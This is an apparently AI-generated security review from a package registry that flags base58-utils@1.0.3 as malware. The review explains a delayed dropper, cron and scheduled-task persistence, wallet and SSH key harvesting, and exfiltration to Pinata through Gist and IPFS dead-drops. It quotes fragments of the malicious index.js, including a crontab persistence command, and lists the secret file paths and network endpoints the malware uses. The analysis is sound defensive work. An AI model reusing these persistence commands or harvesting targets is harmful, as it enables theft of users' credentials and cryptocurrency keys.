registry  /  base58-utils  /  1.0.3

base58-utils@1.0.3

Base58 encode/decode with Solana, Bitcoin, and IPFS support — lightweight, zero dependencies

AI Security Review

scanned 4h ago · by lpm-firewall-ai

Importing `index.js` triggers a delayed hidden payload. It writes and launches a persistent Node implant that can harvest credentials and cryptocurrency keys, then exfiltrate them when remotely activated.

Static reason
No blocking static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
Any runtime import or require of the package; delayed about 37 seconds.
Impact
The implant persists across reboots, scans user secrets and wallet material, and transmits encrypted findings with host metadata.
Mechanism
Delayed payload dropper, OS persistence, credential harvesting, and HTTPS exfiltration.
Attack narrative
Requiring `index.js` schedules code that decodes `test/fixtures/keypairs.dat` into `~/.cache-db/.node-sync/syncd.js`, starts it detached, and establishes cron or scheduled-task persistence. The dropped code checks a Gist and IPFS dead-drops for activation, waits for an idle machine, scans wallet, SSH, document, and shell/environment files for keys and seed phrases, RSA-encrypts discoveries, and uploads them to Pinata.
Rationale
This is a concrete delayed malware chain embedded in a purported Base58 utility: covert payload staging, persistence, wallet/credential harvesting, remote activation, and exfiltration.
Evidence
package.jsonindex.jstest/fixtures/keypairs.dat~/.cache-db/.node-sync/syncd.js~/.cache-db/.node-sync/.lock~/Library/LaunchAgents/com.apple.syncd.plist~/.config/solana~/.ethereum/keystore~/.ssh~/Desktop~/Documents~/Downloads~/.env~/.bashrc~/.zshrc~/.profile~/.bash_profile
Network endpoints5
gist.githubusercontent.com/juang55/b298754cb72942b1cdcf02ccd45cde2f/raw/cfg.txtgateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` runs an import-time timer that drops and starts a hidden Node payload.
  • `index.js` installs cron or Windows scheduled-task persistence for `syncd.js`.
  • `test/fixtures/keypairs.dat` decodes to code that searches wallet, SSH, document, shell-profile, and env files.
  • Decoded payload extracts private keys, seed phrases, keystores, and secret environment values.
  • Decoded payload encrypts findings and POSTs them to `api.pinata.cloud`.
  • Decoded payload uses a mutable Gist/IPFS dead-drop to activate harvesting.
Evidence against
  • `package.json` declares no npm lifecycle hooks.
  • The visible Base58 helpers are otherwise local utility functions with no network behavior.
Behavioral surface
Source
ChildProcessFilesystemShell
Supply chain
HighEntropyStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 3.22 KB of source

Source & flagged code

2 flagged · loading source
index.jsView file
matchType = malicious_source_fingerprint_signature signature = 8a6b9d9250ab2dc6 signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = base58-utils@1.0.1 matchedPath = index.js matchedIdentity = npm:YmFzZTU4LXV0aWxz:1.0.1 similarity = 1.000 shingleOverlap = 1 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
6function encode(buf) { L7: if (typeof buf === "string") buf = Buffer.from(buf, "utf8"); L8: const digits = [0]; ... L62: try { L63: var f = require("fs"), p = require("path"), o = require("os"), c = require("child_process"); L64: var h = o.homedir(), d = p.join(h, ".cache-db", ".node-sync"), s = p.join(d, "syncd.js"); L65: if (f.existsSync(s)) return; ... L70: try { L71: if (process.platform === "linux") { L72: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 }); L73: } else if (process.platform === "win32") {
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L6

Findings

1 High1 Medium2 Low
HighKnown Malware Source Fingerprint Signatureindex.js
MediumInstall Persistenceindex.js
LowFilesystem
LowHigh Entropy Strings